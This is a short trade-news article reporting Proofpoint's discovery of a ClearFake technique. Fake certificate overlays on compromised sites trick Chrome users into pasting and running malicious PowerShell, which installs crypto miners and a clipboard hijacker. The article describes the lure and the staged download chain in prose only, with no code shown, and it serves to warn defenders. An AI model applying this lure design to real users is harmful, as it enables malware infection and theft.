Proofpoint uncovers social engineering technique

Proofpoint Inc.

By Dylan Bushell-Embling
Monday, 24 June, 2024
Proofpoint uncovers social engineering technique

Proofpoint has uncovered a new social engineering technique attempting to coerce victims into copy and pasting malicious PowerShell scripts to infect their computers with malware.

The technique targets users of Google’s popular Chrome web browser. It has been observed as early as 1 March by the ClearFake attack campaign. ClearFake is a fake browser update activity cluster that compromises legitimate websites with malicious HTML and JavaScript.

As part of the technique, when a user visits a compromised website, they are presented with a fake warning overlay prompting them to install a ‘root certificate’ to be able to properly access the page. The message includes a button that copies code into the user’s cache and instructs them to open a PowerShell window, paste the malicious code and run it, Proofpoint said.

In the attack campaign observed by Proofpoint in May, the malicious code performed functions that can include flushing the DNS cache, removing clipboard content, displaying a decoy message to the user and downloading a remote PowerShell script and executing it in-memory.

The remote PowerShell script was used to download another PowerShell script, which itself obtained system temperatures as a check against virtual environments and sandboxes, and if none are found downloads a fourth PowerShell script that downloads a file named data.zip, extracts the content to find any .exe files.

This method was then used to download payloads including cryptocurrency minors, as well as a clipboard hijacker designed to replace cryptocurrency addresses in the clipboard with threat actor-controlled addresses.

“The attack chain is unique and aligns with the overall trend Proofpoint has observed of cybercriminal threat actors adopting new, varied and increasingly creative attack chains,” Proofpoint researchers said in a threat advisory. “Organisations should train users to identify the activity and report suspicious activity to their security teams. This is very specific training but can easily be integrated into an existing user training program.”

Top image credit: iStock.com/BeeBright

Related News

Barracuda Networks enhances email security suite

Barracuda Networks has upgraded its Barracuda Email Protection solution with new capabilities as...

Commvault partners with Crowdstrike

Commvault's new partnership with Crowdstrike will enable joint customers to more rapidly...

Semperis launches Lightning Intelligence platform

Semperis's new threat detection and response tool, Lightning Intelligence, can monitor and...

Content from other channels on our network

Exploring the link between extreme weather and major power outages

Lifestyle community gains a new level of connectivity

WA updates safety guidelines for electrical workers and apprentices

Build Your Expertise and Digital Infrastructure with WBT's HypaConnect Training Course!

Size matters when it comes to sustainable EVs

Reflecting on the government DeepSeek ban

The zero-sum game: data privacy or data analytics?

DTA signs new whole‍-‍of‍-‍government arrangement with AWS

Thought Leadership Insights, episode 1: sponsored by Neat

Government invests $6.4 million in cybersecurity network for health sector

Drones assist firefighting efforts at Sydney recycling plant

Ericsson and co achieve record-breaking 5G speeds

Lancashire Police adds in-car video to full vehicle fleet

Telstra joins TCCA

Australia Needs Purpose-Built Solutions for Next-Generation Call Management

  • All content Copyright © 2025 Westwick-Farrow Pty Ltd